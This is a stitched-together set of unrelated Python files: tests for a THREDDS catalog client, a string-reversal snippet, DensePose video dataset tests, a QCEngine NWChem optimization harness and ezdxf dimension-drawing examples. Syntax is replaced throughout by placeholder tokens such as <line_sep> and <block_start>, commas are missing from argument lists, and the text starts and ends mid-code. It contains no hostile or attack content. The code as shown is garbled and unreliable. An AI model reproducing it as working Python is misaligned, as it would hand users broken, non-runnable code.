<block_start>"""Test getting dataset by time using filenames."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep># Datasets doesn't have any timed datasets <with_stmt>pytest.raises(ValueError)<block_start>cat.datasets.filter_time_nearest(datetime(2015 5 28 17))<block_end><block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_time_range <block_start>"""Test getting datasets by time range using filenames."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep>in_range=cat.catalog_refs.filter_time_range(datetime(2015 5 28 0) datetime(2015 5 29 0))<line_sep>titles=[item.title<for>item in_range]<assert_stmt>titles<eq>['NAM_CONUS_20km_noaaport_20150528_0000.grib1' 'NAM_CONUS_20km_noaaport_20150528_0600.grib1' 'NAM_CONUS_20km_noaaport_20150528_1200.grib1' 'NAM_CONUS_20km_noaaport_20150528_1800.grib1' 'NAM_CONUS_20km_noaaport_20150529_0000.grib1']<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_bad_time_range <block_start>"""Test warning message for bad time range."""<with_stmt>pytest.warns(UserWarning)<block_start>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep>in_range=cat.catalog_refs.filter_time_range(datetime(2015 5 29 0) datetime(2015 5 28 0))<assert_stmt>in_range<eq>[]<block_end><block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_time_range_regex <block_start>"""Test getting datasets by time range using filenames, with manual regex."""<line_sep># This is DatasetCollection.default_regex, but tests passing it explicitly regex=(r'(?P<year>\d{4})(?P<month>[01]\d)(?P<day>[0123]\d)_'<concat>r'(?P<hour>[012]\d)(?P<minute>[0-5]\d)')<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep>in_range=cat.catalog_refs.filter_time_range(datetime(2015 5 28 0) datetime(2015 5 29 0) 
regex=regex)<line_sep>titles=[item.title<for>item in_range]<assert_stmt>titles<eq>['NAM_CONUS_20km_noaaport_20150528_0000.grib1' 'NAM_CONUS_20km_noaaport_20150528_0600.grib1' 'NAM_CONUS_20km_noaaport_20150528_1200.grib1' 'NAM_CONUS_20km_noaaport_20150528_1800.grib1' 'NAM_CONUS_20km_noaaport_20150529_0000.grib1']<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_time_range_strptime <block_start>"""Test getting datasets by time range using filenames, with strptime."""<line_sep>regex=r'noaaport_(?P<strptime>\d{8}_\d{4})'<line_sep>strptime='%Y%m%d_%H%M'<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep>in_range=cat.catalog_refs.filter_time_range(datetime(2015 5 28 0) datetime(2015 5 29 0) regex=regex strptime=strptime)<line_sep>titles=[item.title<for>item in_range]<assert_stmt>titles<eq>['NAM_CONUS_20km_noaaport_20150528_0000.grib1' 'NAM_CONUS_20km_noaaport_20150528_0600.grib1' 'NAM_CONUS_20km_noaaport_20150528_1200.grib1' 'NAM_CONUS_20km_noaaport_20150528_1800.grib1' 'NAM_CONUS_20km_noaaport_20150529_0000.grib1']<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_time_range_raises <block_start>"""Test getting datasets by time range using filenames."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep># No time-based dataset names <with_stmt>pytest.raises(ValueError)<block_start>cat.datasets.filter_time_range(datetime(2015 5 28 0) datetime(2015 5 29 0))<block_end><block_end>@recorder.use_cassette('top_level_cat')<def_stmt>test_catalog_ref_order <block_start>"""Test that catalog references are properly ordered."""<line_sep>url='http://thredds.ucar.edu/thredds/catalog.xml'<line_sep>cat=TDSCatalog(url)<assert_stmt>list(cat.catalog_refs)<eq>['Forecast Model Data' 'Forecast Products and Analyses' 'Observation Data' 'Radar Data' 'Satellite Data' 'Unidata case studies']<block_end>@recorder.use_cassette('cat_non_standard_context_path')<def_stmt>test_non_standard_context_path <block_start>"""Test accessing TDS with non-standard Context Path."""<line_sep>url='http://ereeftds.bom.gov.au/ereefs/tds/catalog/ereef/mwq/P1A/catalog.xml'<line_sep>cat=TDSCatalog(url)<line_sep>ds=cat.datasets['A20020101.P1A.ANN_MIM_RMP.nc']<line_sep>expected=('http://ereeftds.bom.gov.au/ereefs/tds/dodsC/ereef/mwq/'<concat>'P1A/A20020101.P1A.ANN_MIM_RMP.nc')<assert_stmt>ds.access_urls['OPENDAP']<eq>expected<block_end>@recorder.use_cassette('cat_access_elements')<def_stmt>test_access_elements <block_start>"""Test parsing access elements in TDS client catalog."""<line_sep>url='http://oceandata.sci.gsfc.nasa.gov/opendap/SeaWiFS/L3SMI/2001/001/catalog.xml'<line_sep>cat=TDSCatalog(url)<assert_stmt>len(list(cat.datasets))<ne>0<block_end>@recorder.use_cassette('cat_only_http')<def_stmt>test_simple_service_within_compound <block_start>"""Test parsing of a catalog that asks for a single service within a compound one."""<line_sep>url=('http://thredds-test.unidata.ucar.edu/thredds/catalog/noaaport/text/'<concat>'tropical/atlantic/hdob/catalog.xml')<line_sep>cat=TDSCatalog(url)<assert_stmt>(cat.datasets[0].access_urls<eq>{'HTTPServer':'http://thredds-test.unidata.ucar.edu/thredds/'<concat>'fileServer/noaaport/text/tropical/atlantic/hdob/'<concat>'High_density_obs_20170824.txt'})<block_end>@recorder.use_cassette('rsmas_ramadda')<def_stmt>test_ramadda_catalog 
<block_start>"""Test parsing a catalog from RAMADDA."""<line_sep>url='http://weather.rsmas.miami.edu/repository?output=thredds.catalog'<line_sep>cat=TDSCatalog(url)<assert_stmt>len(cat.catalog_refs)<eq>12<block_end>@recorder.use_cassette('rsmas_ramadda_datasets')<def_stmt>test_ramadda_access_urls <block_start>"""Test creating access urls from a catalog from RAMADDA."""<line_sep>url='http://weather.rsmas.miami.edu/repository?output=thredds.catalog'<line_sep># Walk down a few levels to where we can get a dataset cat=(TDSCatalog(url).catalog_refs[0].follow().catalog_refs[0].follow().catalog_refs[0].follow())<line_sep>ds=cat.datasets[3]<assert_stmt>ds.access_urls['opendap']<eq>('http://weather.rsmas.miami.edu/repository/opendap/'<concat>'synth:a43c1cc4-1cf2-4365-97b9-6768b8201407:L3YyYl91c'<concat>'2VzRUNPQS9keW5hbW9fYmFzaWNfdjJiXzIwMTFhbGwubmM='<concat>'/entry.das')<block_end>@recorder.use_cassette('tds50_catalogref_follow')<def_stmt>test_tds50_catalogref_follow <block_start>"""Test following a catalog ref url on TDS 5."""<line_sep>cat=TDSCatalog('http://thredds-test.unidata.ucar.edu/thredds/catalog.xml')<assert_stmt>len(cat.catalog_refs[0].follow().catalog_refs)<eq>59<block_end>@recorder.use_cassette('top_level_cat')<def_stmt>test_catalog_ref_str <block_start>"""Test that catalog references are properly represented as strings."""<line_sep>url='http://thredds.ucar.edu/thredds/catalog.xml'<line_sep>cat=TDSCatalog(url)<assert_stmt>str(cat.catalog_refs[0])<eq>'Forecast Model Data'<block_end>@recorder.use_cassette('ncei_embedded_metadata')<def_stmt>test_catalog_with_embedded_metadata_elements <block_start>"""Test catalog with embedded metadata elements."""<line_sep>url='https://www.ncei.noaa.gov/thredds/catalog/namanl/201802/20180220/catalog.xml'<line_sep>cat=TDSCatalog(url)<line_sep>md=cat.metadata<assert_stmt>'external_metadata'<in>md<assert_stmt>'serviceName'<in>md<block_end>@recorder.use_cassette('latest_resolver_on_latest_dataset')<def_stmt>test_latest_resolver_fail <block_start>"""Test getting latest on catalog that does not have a resolver."""<line_sep>cat=TDSCatalog('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/GFS/'<concat>'Global_0p25deg_ana/latest.xml')<line_sep>latest=''<with_stmt>pytest.raises(AttributeError)<as>excinfo<block_start>latest=cat.latest<block_end><assert_stmt>latest<eq>''<assert_stmt>'"latest" not available for this catalog'<in>str(excinfo.value)<block_end>
a=input("Enter your string to reverse: \n")<line_sep>print(a[::-1])<line_sep>
# Copyright (c) Facebook, Inc. and its affiliates. <import_stmt>contextlib<import_stmt>os<import_stmt>random<import_stmt>tempfile<import_stmt>unittest<import_stmt>torch<import_stmt>torchvision.io<as>io<import_from_stmt>densepose.data.transform ImageResizeTransform<import_from_stmt>densepose.data.video RandomKFramesSelector VideoKeyframeDataset<try_stmt><block_start><import_stmt>av<block_end><except_stmt>ImportError<block_start>av=<none><block_end># copied from torchvision test/test_io.py <def_stmt>_create_video_frames num_frames height width<block_start>y,x=torch.meshgrid(torch.linspace(-2 2 height) torch.linspace(-2 2 width))<line_sep>data=[]<for_stmt>i range(num_frames)<block_start>xc=float(i)/num_frames<line_sep>yc=1-float(i)/(2<times>num_frames)<line_sep>d=torch.exp(-((x-xc)<power>2+(y-yc)<power>2)/2)<times>255<line_sep>data.append(d.unsqueeze(2).repeat(1 1 3).byte())<block_end><return>torch.stack(data 0)<block_end># adapted from torchvision test/test_io.py @contextlib.contextmanager<def_stmt>temp_video num_frames height width fps lossless=<false> video_codec=<none> options=<none><block_start><if_stmt>lossless<block_start><if_stmt>video_codec<is><not><none><block_start><raise>ValueError("video_codec can't be specified together with lossless")<block_end><if_stmt>options<is><not><none><block_start><raise>ValueError("options can't be specified together with lossless")<block_end>video_codec="libx264rgb"<line_sep>options={"crf":"0"}<block_end><if_stmt>video_codec<is><none><block_start>video_codec="libx264"<block_end><if_stmt>options<is><none><block_start>options={}<block_end>data=_create_video_frames(num_frames height width)<with_stmt>tempfile.NamedTemporaryFile(suffix=".mp4")<as>f<block_start>f.close()<line_sep>io.write_video(f.name data fps=fps video_codec=video_codec options=options)<line_sep><yield>f.name data<block_end>os.unlink(f.name)<block_end>@unittest.skipIf(av<is><none> "PyAV unavailable")<class_stmt>TestVideoKeyframeDataset(unittest.TestCase)<block_start><def_stmt>test_read_keyframes_all self<block_start><with_stmt>temp_video(60 300 300 5 video_codec="mpeg4")<as>(fname data)<block_start>video_list=[fname]<line_sep>category_list=[<none>]<line_sep>dataset=VideoKeyframeDataset(video_list category_list)<line_sep>self.assertEqual(len(dataset) 1)<line_sep>data1,categories1=dataset[0]["images"] dataset[0]["categories"]<line_sep>self.assertEqual(data1.shape torch.Size((5 3 300 300)))<line_sep>self.assertEqual(data1.dtype torch.float32)<line_sep>self.assertIsNone(categories1[0])<line_sep><return><block_end>self.assertTrue(<false>)<block_end><def_stmt>test_read_keyframes_with_selector self<block_start><with_stmt>temp_video(60 300 300 5 video_codec="mpeg4")<as>(fname data)<block_start>video_list=[fname]<line_sep>category_list=[<none>]<line_sep>random.seed(0)<line_sep>frame_selector=RandomKFramesSelector(3)<line_sep>dataset=VideoKeyframeDataset(video_list category_list frame_selector)<line_sep>self.assertEqual(len(dataset) 1)<line_sep>data1,categories1=dataset[0]["images"] dataset[0]["categories"]<line_sep>self.assertEqual(data1.shape torch.Size((3 3 300 300)))<line_sep>self.assertEqual(data1.dtype torch.float32)<line_sep>self.assertIsNone(categories1[0])<line_sep><return><block_end>self.assertTrue(<false>)<block_end><def_stmt>test_read_keyframes_with_selector_with_transform self<block_start><with_stmt>temp_video(60 300 300 5 video_codec="mpeg4")<as>(fname 
data)<block_start>video_list=[fname]<line_sep>category_list=[<none>]<line_sep>random.seed(0)<line_sep>frame_selector=RandomKFramesSelector(1)<line_sep>transform=ImageResizeTransform()<line_sep>dataset=VideoKeyframeDataset(video_list category_list frame_selector transform)<line_sep>data1,categories1=dataset[0]["images"] dataset[0]["categories"]<line_sep>self.assertEqual(len(dataset) 1)<line_sep>self.assertEqual(data1.shape torch.Size((1 3 800 800)))<line_sep>self.assertEqual(data1.dtype torch.float32)<line_sep>self.assertIsNone(categories1[0])<line_sep><return><block_end>self.assertTrue(<false>)<block_end><block_end>
<import_from_stmt>typing Union Dict Any<import_from_stmt>qcelemental.models OptimizationInput AtomicInput OptimizationResult Provenance<import_from_stmt>qcengine.config TaskConfig<import_from_stmt>qcengine.exceptions UnknownError InputError<import_from_stmt>qcengine.procedures.nwchem_opt.harvester harvest_as_atomic_result<import_from_stmt>qcengine.programs.nwchem.runner NWChemHarness<import_from_stmt>qcengine.procedures.model ProcedureHarness<class_stmt>NWChemDriverProcedure(ProcedureHarness)<block_start>"""Structural relaxation using NWChem's optimizer"""<line_sep>_defaults={"name":"NWChemDriver" "procedure":"optimization"}<class_stmt>Config(ProcedureHarness.Config)<block_start><pass><block_end><def_stmt>found self raise_error:bool=<false><arrow>bool<block_start>nwc_harness=NWChemHarness()<line_sep><return>nwc_harness.found(raise_error)<block_end><def_stmt>get_version self<arrow>str<block_start>nwc_harness=NWChemHarness()<line_sep><return>nwc_harness.get_version()<block_end><def_stmt>build_input_model self data:Union[Dict[str Any] "OptimizationInput"]<arrow>OptimizationInput<block_start><return>self._build_model(data OptimizationInput)<block_end><def_stmt>compute self input_data:OptimizationInput config:TaskConfig<arrow>"BaseModel"<block_start>nwc_harness=NWChemHarness()<line_sep>self.found(raise_error=<true>)<line_sep># Unify the keywords from the OptimizationInput and QCInputSpecification # Optimization input will override, but don't tell users this as it seems unnecessary keywords=input_data.keywords.copy()<line_sep>keywords.update(input_data.input_specification.keywords)<if_stmt>keywords.get("program" "nwchem").lower()<ne>"nwchem"<block_start><raise>InputError("NWChemDriver procedure only works with NWChem")<block_end># Make an atomic input atomic_input=AtomicInput(molecule=input_data.initial_molecule driver="energy" keywords=keywords **input_data.input_specification.dict(exclude={"driver" "keywords"}) )<line_sep># Build the inputs for the job job_inputs=nwc_harness.build_input(atomic_input config)<line_sep># Replace the last line with a "task {} optimize" input_file:str=job_inputs["infiles"]["nwchem.nw"].strip()<line_sep>beginning,last_line=input_file.rsplit("\n" 1)<assert_stmt>last_line.startswith("task")<line_sep>last_line=f"task {last_line.split(' ')[1]} optimize"<line_sep>job_inputs["infiles"]["nwchem.nw"]=f"{beginning}\n{last_line}"<line_sep># Run it! 
success,dexe=nwc_harness.execute(job_inputs)<line_sep># Check for common errors <if_stmt>"There is an error in the input file"<in>dexe["stdout"]<block_start><raise>InputError(dexe["stdout"])<block_end><if_stmt>"not compiled"<in>dexe["stdout"]# recoverable with a different compilation with optional modules <block_start><raise>InputError(dexe["stdout"])<block_end># Parse it <if_stmt>success<block_start>dexe["outfiles"]["stdout"]=dexe["stdout"]<line_sep>dexe["outfiles"]["stderr"]=dexe["stderr"]<line_sep><return>self.parse_output(dexe["outfiles"] input_data)<block_end><else_stmt><block_start><raise>UnknownError(dexe["stdout"])<block_end><block_end><def_stmt>parse_output self outfiles:Dict[str str] input_model:OptimizationInput<arrow>OptimizationResult# Get the stdout from the calculation (required) <block_start>stdout=outfiles.pop("stdout")<line_sep>stderr=outfiles.pop("stderr")<line_sep># Parse out the atomic results from the file atomic_results=harvest_as_atomic_result(input_model stdout)<line_sep># Isolate the converged result final_step=atomic_results[-1]<line_sep><return>OptimizationResult(initial_molecule=input_model.initial_molecule input_specification=input_model.input_specification final_molecule=final_step.molecule trajectory=atomic_results energies=[float(r.extras["qcvars"]["CURRENT ENERGY"])<for>r atomic_results] stdout=stdout stderr=stderr success=<true> provenance=Provenance(creator="NWChemRelax" version=self.get_version() routine="nwchem_opt") )<block_end><block_end>
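For context, a harness like this is normally reached through QCEngine's procedure dispatch rather than instantiated directly. The sketch below is a hedged illustration only: it assumes the registered procedure name is the lowercased `"nwchemdriver"`, that an NWChem installation is available, and it uses a made-up water geometry with an SCF/STO-3G model.

```python
# Hedged sketch: request a geometry optimization through qcengine's procedure interface.
import qcelemental as qcel
import qcengine as qcng

mol = qcel.models.Molecule.from_data(
    """
    O  0.000  0.000  0.000
    H  0.000  0.000  0.950
    H  0.000  0.900 -0.250
    """
)

opt_input = qcel.models.OptimizationInput(
    initial_molecule=mol,
    input_specification={
        "driver": "gradient",                         # the harness rewrites the task to "optimize"
        "model": {"method": "scf", "basis": "sto-3g"},
    },
    keywords={"program": "nwchem"},                   # checked by the compute() method above
)

result = qcng.compute_procedure(opt_input, "nwchemdriver")  # assumed registered name
if result.success:
    print(result.energies[-1])
    print(result.final_molecule.geometry)
```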
# Purpose: using DIMENSION horizontal, vertical and rotated # Copyright (c) 2018-2021, <NAME> # License: MIT License <import_from_stmt>typing TYPE_CHECKING<import_stmt>sys<import_stmt>math<import_stmt>pathlib<import_stmt>random<import_stmt>ezdxf<import_from_stmt>ezdxf.tools.standards setup_dimstyle<import_from_stmt>ezdxf.math Vec3 UCS<import_stmt>logging<if_stmt>TYPE_CHECKING<block_start><import_from_stmt>ezdxf.eztypes DimStyle DimStyleOverride<block_end># ======================================== # IMPORTANT: # this script uses f-strings (Python 3.6) # ======================================== <if_stmt>sys.version_info<l>(3 6)<block_start>print("This script requires Python 3.6 (f-strings)")<line_sep>sys.exit()<block_end># ======================================== # Setup logging # ======================================== logging.basicConfig(level="WARNING")<line_sep># ======================================== # Setup your preferred output directory # ======================================== OUTDIR=pathlib.Path("~/Desktop/Outbox").expanduser()<if_stmt><not>OUTDIR.exists()<block_start>OUTDIR=pathlib.Path()<block_end># ======================================== # Default text attributes # ======================================== TEXT_ATTRIBS={"height":0.25 "style":ezdxf.options.default_dimension_text_style }<line_sep>DIM_TEXT_STYLE=ezdxf.options.default_dimension_text_style<line_sep># ======================================================= # Discarding dimension rendering is possible # for BricsCAD, but is incompatible to AutoCAD -> error # ======================================================= BRICSCAD=<false><def_stmt>set_text_style doc textstyle=DIM_TEXT_STYLE name="EZDXF"<block_start><if_stmt>doc.dxfversion<eq>"AC1009"<block_start><return><block_end>dimstyle=doc.dimstyles.get(name)# type: DimStyle dimstyle.dxf.dimtxsty=textstyle<block_end><def_stmt>linear_tutorial dxfversion="R12"<block_start>doc=ezdxf.new(dxfversion setup=<true>)<line_sep>msp=doc.modelspace()<line_sep>msp.add_line((0 0) (3 0))<line_sep>msp.add_line((0 7) (10 0))<line_sep># horizontal DIMENSION # Default DimStyle EZDXF: 1 drawing unit == 1m; scale 1: 100; length_factor=100 -> measurement in cm # # base: defines the dimension line, ezdxf accepts any point on the dimension line # p1: defines the start point of the first extension line, which also defines the first point to measure # p2: defines the start point of the second extension line, which also defines the second point to measure dim=msp.add_linear_dim(base=(3 2) p1=(0 0) p2=(3 0) dimstyle="EZDXF" override={"dimtxsty":"OpenSans"} )<line_sep># Necessary second step, to create the BLOCK entity with the DIMENSION geometry. # ezdxf supports DXF R2000 attributes for DXF R12 rendering, but they have to be applied by the DIMSTYLE override # feature, this additional attributes are not stored in the XDATA section of the DIMENSION entity, they are just # used to render the DIMENSION entity. # The return value `dim` is not a DIMENSION entity, instead a DimStyleOverride object is returned, the DIMENSION # entity is stored as dim.dimension, see also ezdxf.override.DimStyleOverride class. 
dim.render()<line_sep># rotated DIMENSION without `override` uses ezdxf.options.default_dimension_text_style (OpenSansCondensed-Light) # angle: defines the angle of the dimension line in relation to the x-axis of the WCS or UCS, measurement is the # distance between first and second measurement point in direction of `angle` dim2=msp.add_linear_dim(base=(10 2) p1=(7 0) p2=(10 0) angle=-30 dimstyle="EZDXF" override={"dimdle":0 "dimdec":2 "dimtfill":2 # custom text fill "dimtfillclr":4 # cyan } )<line_sep># type: DimStyleOverride # Some properties have setter methods for convenience, this is also the reason for not calling dim2.render() # automatically. dim2.set_arrows(blk=ezdxf.ARROWS.closed_filled size=0.25)<line_sep>dim2.set_text_align(halign="right")<line_sep>dim2.render()<line_sep>doc.set_modelspace_vport(height=5 center=(5 0))<line_sep>doc.saveas(OUTDIR/f"dim_linear_{dxfversion}_tutorial.dxf")<block_end><def_stmt>example_background_fill dxfversion="R12"<block_start>""" This example shows the background fill feature, ezdxf uses MTEXT for this feature and has no effect in DXF R12. """<line_sep>doc=ezdxf.new(dxfversion setup=<true>)<line_sep>msp=doc.modelspace()<line_sep>msp.add_line((0 2.2) (10 2.2))<line_sep>dim=msp.add_linear_dim(base=(0 2) p1=(0 0) p2=(3 0) dimstyle="EZDXF" override={"dimtfill":1 # background color } )<line_sep># type: DimStyleOverride dim.set_text("bgcolor")<line_sep>dim.render()<line_sep>dim=msp.add_linear_dim(base=(0 2) p1=(5 0) p2=(8 0) dimstyle="EZDXF" override={"dimtfill":2 # custom text fill "dimtfillclr":4 # cyan } )<line_sep># type: DimStyleOverride dim.set_text("cyan")<line_sep>dim.render()<line_sep>doc.saveas(OUTDIR/f"background_fill_example_{dxfversion}.dxf")<block_end><def_stmt>example_for_all_text_placings_R12 <block_start>doc=ezdxf.new("R12" setup=<true>)<line_sep>example_for_all_text_placings(doc "dim_linear_text_placing_R12.dxf")<block_end><def_stmt>example_for_all_text_placings_ucs_R12 <block_start>ucs=UCS(origin=(10 10 0) ux=(3 1 0) uz=(0 0 1))<line_sep>doc=ezdxf.new("R12" setup=<true>)<line_sep>example_for_all_text_placings(doc "dim_linear_text_placing_ucs_R12.dxf" ucs)<block_end><def_stmt>example_for_all_text_placings_in_space_R12 <block_start>ucs=UCS(ux=(1 1 0) uy=(0 0 1))<line_sep>doc=ezdxf.new("R12" setup=<true>)<line_sep>example_for_all_text_placings(doc "dim_linear_text_placing_in_space_R12.dxf" ucs)<block_end><def_stmt>example_for_all_text_placings_R2007 <block_start>doc=ezdxf.new("R2007" setup=<true>)<line_sep>set_text_style(doc)<line_sep>example_for_all_text_placings(doc "dim_linear_text_placing_R2007.dxf")<block_end><def_stmt>example_for_all_text_placings_ucs_R2007 <block_start>ucs=UCS(origin=(10 10 0) ux=(3 1 0) uz=(0 0 1))<line_sep>doc=ezdxf.new("R2007" setup=<true>)<line_sep>set_text_style(doc)<line_sep>example_for_all_text_placings(doc "dim_linear_text_placing_ucs_R2007.dxf" ucs)<block_end><def_stmt>example_for_all_text_placings_in_space_R2007 <block_start>ucs=(UCS(origin=(20 20 0)).rotate_local_x(math.radians(45)).rotate_local_z(math.radians(45)))<line_sep>doc=ezdxf.new("R2007" setup=<true>)<line_sep>set_text_style(doc)<line_sep>example_for_all_text_placings(doc "dim_linear_text_placing_in_space_R2007.dxf" ucs)<block_end><def_stmt>example_for_all_text_placings doc filename ucs=<none><block_start>""" This example shows many combinations of dimension text placing by `halign`, `valign` and user defined location override. 
Args: doc: DXF drawing filename: file name for saving ucs: user defined coordinate system """<def_stmt>add_text lines insert<block_start>insert<augadd>(0.2 0)<line_sep>attribs=dict(TEXT_ATTRIBS)<line_sep>line_space=0.4<line_sep>delta=Vec3(0 line_space 0)<for_stmt>line lines<block_start>text=msp.add_text(line dxfattribs=attribs).set_pos(insert)<if_stmt>ucs<block_start>text.transform(ucs.matrix)<block_end>insert<augsub>delta<block_end><block_end>msp=doc.modelspace()<line_sep>setup_dimstyle(doc name="TICK" fmt="EZ_M_100_H25_CM" style=DIM_TEXT_STYLE )<line_sep>setup_dimstyle(doc name="ARCHTICK" fmt="EZ_M_100_H25_CM" blk=ezdxf.ARROWS.architectural_tick style=DIM_TEXT_STYLE )<line_sep>setup_dimstyle(doc name="CLOSEDBLANK" fmt="EZ_M_100_H25_CM" blk=ezdxf.ARROWS.closed_blank style=DIM_TEXT_STYLE )<def_stmt>text dimstyle x y halign valign oblique=0<block_start>""" Default dimension text placing Args: dimstyle: dimstyle to use x: start point x y: start point y halign: horizontal text alignment - `left`, `right`, `center`, `above1`, `above2`, requires DXF R2000+ valign: vertical text alignment `above`, `center`, `below` oblique: angle of oblique extension line, 0 = orthogonal to dimension line """<line_sep>dimattr={}<if_stmt>oblique<block_start>dimattr["oblique_angle"]=oblique<block_end>base=(x y+2)<line_sep># wide dim=msp.add_linear_dim(base=base p1=(x y) p2=(x+5 y) dimstyle=dimstyle dxfattribs=dimattr )<line_sep># type: DimStyleOverride dim.set_text_align(halign=halign valign=valign)<line_sep>dim.render(ucs=ucs discard=BRICSCAD)<line_sep>add_text([f"halign={halign}" f"valign={valign}" f"oblique={oblique}"] insert=Vec3(x y) )<line_sep># narrow dim=msp.add_linear_dim(base=base p1=(x+7 y) p2=(x+7.3 y) dimstyle=dimstyle dxfattribs=dimattr )<line_sep># type: DimStyleOverride dim.set_text_align(halign=halign valign=valign)<line_sep>dim.render(ucs=ucs discard=BRICSCAD)<line_sep># arrows inside, text outside dim=msp.add_linear_dim(base=base p1=(x+10 y) p2=(x+10.9999 y) dimstyle=dimstyle override={"dimdec":2} dxfattribs=dimattr )<line_sep># type: DimStyleOverride dim.set_text_align(halign=halign valign=valign)<line_sep>dim.render(ucs=ucs discard=BRICSCAD)<line_sep># narrow and force text inside dim=msp.add_linear_dim(base=base p1=(x+14 y) p2=(x+14.3 y) dimstyle=dimstyle override={"dimtix":1} dxfattribs=dimattr )<line_sep># type: DimStyleOverride dim.set_text_align(halign=halign valign=valign)<line_sep>dim.render(ucs=ucs discard=BRICSCAD)<block_end><def_stmt>user_text_free dimstyle x=0 y=0 leader=<false><block_start>""" User defined dimension text placing. 
Args: dimstyle: dimstyle to use x: start point x y: start point y leader: use leader line if True """<line_sep>override={"dimdle":0.0 "dimexe":0.5 # length of extension line above dimension line "dimexo":0.5 # extension line offset "dimtfill":2 # custom text fill "dimtfillclr":4 # cyan }<line_sep>base=(x y+2)<line_sep>dim=msp.add_linear_dim(base=base p1=(x y) p2=(x+3 y) dimstyle=dimstyle override=override )<line_sep># type: DimStyleOverride location=Vec3(x+3 y+3 0)<line_sep>dim.set_location(location leader=leader)<line_sep>dim.render(ucs=ucs discard=BRICSCAD)<line_sep>add_text([f"usr absolute={location}" f"leader={leader}"] insert=Vec3(x y))<line_sep>x<augadd>4<line_sep>dim=msp.add_linear_dim(base=base p1=(x y) p2=(x+3 y) dimstyle=dimstyle override=override )<line_sep># type: DimStyleOverride relative=Vec3(-1 +1)# relative to dimline center dim.set_location(relative leader=leader relative=<true>)<line_sep>dim.render(ucs=ucs discard=BRICSCAD)<line_sep>add_text([f"usr relative={relative}" f"leader={leader}"] insert=Vec3(x y))<line_sep>x<augadd>4<line_sep>dim=msp.add_linear_dim(base=base p1=(x y) p2=(x+3 y) dimstyle=dimstyle override=override )<line_sep># type: DimStyleOverride dh=-0.7<line_sep>dv=1.5<line_sep>dim.shift_text(dh dv)<line_sep>dim.render(ucs=ucs discard=BRICSCAD)<line_sep>add_text([f"shift text=({dh}, {dv})" ] insert=Vec3(x y) )<line_sep>override["dimtix"]=1# force text inside x<augadd>4<line_sep>dim=msp.add_linear_dim(base=base p1=(x y) p2=(x+0.3 y) dimstyle=dimstyle override=override )<line_sep># type: DimStyleOverride dh=0<line_sep>dv=1<line_sep>dim.shift_text(dh dv)<line_sep>dim.render(ucs=ucs discard=BRICSCAD)<line_sep>add_text([f"shift text=({dh}, {dv})" ] insert=Vec3(x y) )<block_end>dimstyles=["TICK" "ARCHTICK" "CLOSEDBLANK"]<line_sep>xoffset=17<line_sep>yoffset=5<for_stmt>col,dimstyle enumerate(dimstyles)<block_start>row=0<for_stmt>halign ("center" "left" "right")<block_start>text(dimstyle x=col<times>xoffset y=row<times>yoffset halign=halign valign="above" )<line_sep>row<augadd>1<line_sep>text(dimstyle x=col<times>xoffset y=row<times>yoffset halign=halign valign="center" )<line_sep>row<augadd>1<line_sep>text(dimstyle x=col<times>xoffset y=row<times>yoffset halign=halign valign="below" )<line_sep>row<augadd>1<block_end>text(dimstyle x=col<times>xoffset y=row<times>yoffset halign="above1" valign="above" )<line_sep>row<augadd>1<line_sep>text(dimstyle x=col<times>xoffset y=row<times>yoffset halign="above2" valign="above" )<line_sep>row<augadd>1<line_sep>user_text_free(dimstyle x=col<times>xoffset y=row<times>yoffset)<line_sep>row<augadd>1<line_sep>user_text_free(dimstyle x=col<times>xoffset y=row<times>yoffset leader=<true>)<line_sep>row<augadd>1<line_sep>text(dimstyle x=col<times>xoffset y=row<times>yoffset halign="center" valign="above" oblique=70 )<line_sep>row<augadd>1<line_sep>text(dimstyle x=col<times>xoffset y=row<times>yoffset halign="above1" valign="above" oblique=80 )<line_sep>row<augadd>1<block_end>doc.saveas(OUTDIR/filename)<block_end><def_stmt>example_multi_point_linear_dimension <block_start>""" Example for using the ezdxf "multi-point linear dimension" feature, which generates dimension entities for multiple points at ones and tries to move dimension text to a readable location. This feature works best with DXF R2007+. 
"""<line_sep>doc=ezdxf.new("R2007" setup=<true>)<line_sep>msp=doc.modelspace()<line_sep>points=[(0 0) (5 1) (5.2 1) (5.4 0) (7 0) (10 3)]<line_sep>msp.add_lwpolyline(points)<line_sep># create quick a new DIMSTYLE as alternative to overriding DIMSTYLE attributes dimstyle=doc.dimstyles.duplicate_entry("EZDXF" "WITHTFILL")<line_sep># type: DimStyle dimstyle.dxf.dimtfill=1<line_sep>msp.add_multi_point_linear_dim(base=(0 5) points=points dimstyle="WITHTFILL")<line_sep>doc.saveas(OUTDIR/f"multi_point_linear_dim_R2007.dxf")<block_end><def_stmt>random_point start end<block_start>dist=end-start<line_sep><return>Vec3(start+random.random()<times>dist start+random.random()<times>dist)<block_end><def_stmt>example_random_multi_point_linear_dimension count=10 length=20 discard=BRICSCAD<block_start>""" Example for using the ezdxf "multi-point linear dimension" feature, which generates dimension entities for multiple points at ones and tries to move dimension text to a readable location. This feature works best with DXF R2007+. """<line_sep>doc=ezdxf.new("R2007" setup=<true>)<line_sep>msp=doc.modelspace()<line_sep># create a random polyline. points=[random_point(0 length)<for>_ range(count)]<line_sep>msp.add_lwpolyline(points 